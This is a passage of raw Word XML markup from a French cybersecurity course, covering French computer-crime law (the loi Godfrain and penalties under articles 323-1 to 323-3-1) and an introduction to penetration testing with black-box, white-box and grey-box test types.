    <w:p w14:paraId="29DF32D4" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="CC0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t xml:space="preserve">La lutte contre la cybercriminalité en France </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72ADC076" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EBD59B8" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="103"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t>La loi Godfrain</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> du 5 janvier 1988 stipule que</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> l’accès ou le maintien frauduleux </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">dans tout ou partie d’un système de traitement automatisé de données - STAD (art. 323-1, al. 1 du CP), est puni de 2 ans d’emprisonnement et de 30.000€ d’amende au maximum. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11279C39" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37A0E8E9" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="103"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le fait </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t>d’entraver ou de fausser</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> le fonctionnement d’un tel système (art. 323-2 du CP) est puni d’un maximum de 5 ans d’emprisonnement et de 75.000€ d’amende. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331400F2" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="217516A3" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="103"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t xml:space="preserve">L’introduction, la suppression ou la modification frauduleuse de données </w:t>
      </w:r>
      <w:r>
        <w:t>dans un système de traitement automatisé (art. 323-3 du CP) est puni d’un maximum de 5 ans d’emprisonnement et de 75.000€ d’amende.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F23313" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D9E1ACC" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="103"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L’article 323-3-1 (crée par la loi pour la confiance dans l'économie </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>numérique )</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> incrimine le fait </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t>d’importer, de détenir, d’offrir, de céder ou de mettre à disposition, sans motif légitime, un programme ou un moyen  permettant de commettre les infractions</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> prévues aux articles 323-1 à 323-3 (mêmes sanctions)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5576D51B" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4ADA5436" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34DD6892" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D01716C" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="74"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_6uri2eifcnoa" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="20"/>
      <w:r>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t xml:space="preserve">Module 2 - Introduction au </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t>pentesting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B69018B" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="766D0C02" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="136"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">définition et objectif du </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pentesting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="507292C0" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="136"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Les types de tests d’intrusions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5674AA7D" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="136"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Les phases d’un test d’intrusion </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BD55F9" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="136"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Planification et préparation </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E98261E" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="2DFB45FC" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_ov2neb7jo0dq" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w14:paraId="1BB89C68" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_33ucexzb4bpp" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="22"/>
      <w:r>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t xml:space="preserve">Chapitre 1 - Définition et objectifs du </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t>Pentesting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1454FCAE" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B6E49D9" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Le </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pentesting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> est également appelé test d’intrusion ou test de pénétration. C’est une technique qui consiste à analyser une cible en se comportant comme un pirate informatique.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7113CADE" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="1F5A99F7" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="CC0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t xml:space="preserve">L’objectif du test d’intrusion </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D1612F" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">est de repérer les potentielles failles et </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vulné</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> de votre système. Il permettra de corriger les vulnérabilités afin de sécuriser vos infrastructures. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088A3AB8" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="39FB5506" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="79F99926" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="77753C10" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="678E3C5A" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="56AE435A" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="765ABACB" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="11BCFB8E" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_lezhuvfhhx0x" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="23"/>
      <w:r>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t xml:space="preserve">Chapitre 2 - Les types de test d’intrusion </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0B292A" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="114300" distB="114300" distL="114300" distR="114300" simplePos="0" relativeHeight="251665408" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="245F7C66" wp14:editId="7E3411E5">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>266700</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>127588</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4824413" cy="2652625"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="7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8"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4824413" cy="2652625"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3936FB09" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="0D496CC0" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="54DDCB7A" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="5BD3FD55" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="6EAA82F0" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="1E6E21F5" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="021975B8" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="25C5D2C9" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="313432AD" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="3A88F688" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="33669786" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="01CFBA8A" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="1933DEDB" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="75F93D2B" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="75AC81A5" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Boîte noire</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F68DDA" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="0EACC83A" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="97"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Le test d’intrusion en boîte noire est réalisé dans les conditions les plus proches d’une attaque externe réalisée par une attaquant distant inconnu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158A1F6E" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EE487F0" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="97"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Les tests en boîte noire supposent que le pentester n’a aucune connaissance préalable de l’infrastructure à tester</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503FFF3E" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="422FCD82" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="97"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le test d’intrusion doit être réalisé après une collecte d’info et des recherches approfondies. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EEBC1DA" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7578A8ED" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="97"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ce test simule le processus </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>du hacking</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> réel et recueille des info accessibles au public telles des adresses de domaine et les adresses IP. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F5790B" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54317908" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="97"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Une partie considérable du temps alloué au projet est consacrée à la découverte de la nature de l’infrastructure et de la façon dont elle est connectée et inter reliée.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08FD002D" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CFC70C6" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="97"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Cela prend du temps et coûte cher.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7F3F23" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="4BA5E812" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="36C4E9E2" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Boite blanche</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4D59CB" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="217AA0A8" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le test d’intrusion en boîte blanche est réalisé avec le maximum d’informations partagées avec les pentester avant l’audit. Les infos nécessaires au test d’intrusion sont fournies en toute transparence. Le fonctionnement de la cible est alors connu et rendu visible. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787213AF" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B6A2BCA" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Le testeur reçoit des infos complètes sur l’infrastructures à tester</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431ED11B" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1048C1CB" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Ce test simule le processus des employés d’une entreprise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523F3913" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E7D6DCF" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Il permet de révéler plus rapidement les bogues et les vulnérabilités</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CEA8B39" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CEBC833" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il donne l’assurance d’une couverture de test complète, car le testeur sait exactement ce qu’il doit tester. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6C12BD" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="791797B3" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1923B354" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Boîte grise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A35664" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="5A35E8A2" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="84"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le test d’intrusion grise est réalisé avec le minimum d’infos partagées avec les pentesters avant </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>l’audit:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="612A726E" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="84"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Infos sur le fonctionnement de la cible</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3474CF29" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="84"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>fournir des comptes utilisateurs sur la plateforme à accès restreinte,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003C32A3" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="84"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Donner accès à une cible non accessible au public. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206F496B" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68605C2C" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="84"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ce test est une combinaison de tests en boîte noire et en boîte blanche </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BCE517" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10AD8CC8" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="84"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Dans un test en boite grise, le testeur dispose généralement d’infos limitées</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFE9DEF" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EFDCC63" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="84"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L’évaluation et le test de sécurité sont effectués en interne. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6996E7D3" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D487F37" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="84"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ils testent les applications pour toutes les vulnérabilités qu’un pirate pourrait trouver et exploiter. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41453A98" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="84"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il est réalisé le plus souvent lorsqu’un pentester commence un test en boîte noire sur des systèmes protégés et constate qu’un peu de connaissances préalables sont nécessaires pour effectuer un examen approfondi. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E5BC5A" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63778815" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_im5hxchq5uy4" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="7BAC8117" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="125"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_deq7rilsdvxy" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="25"/>
      <w:r>
        <w:rPr>
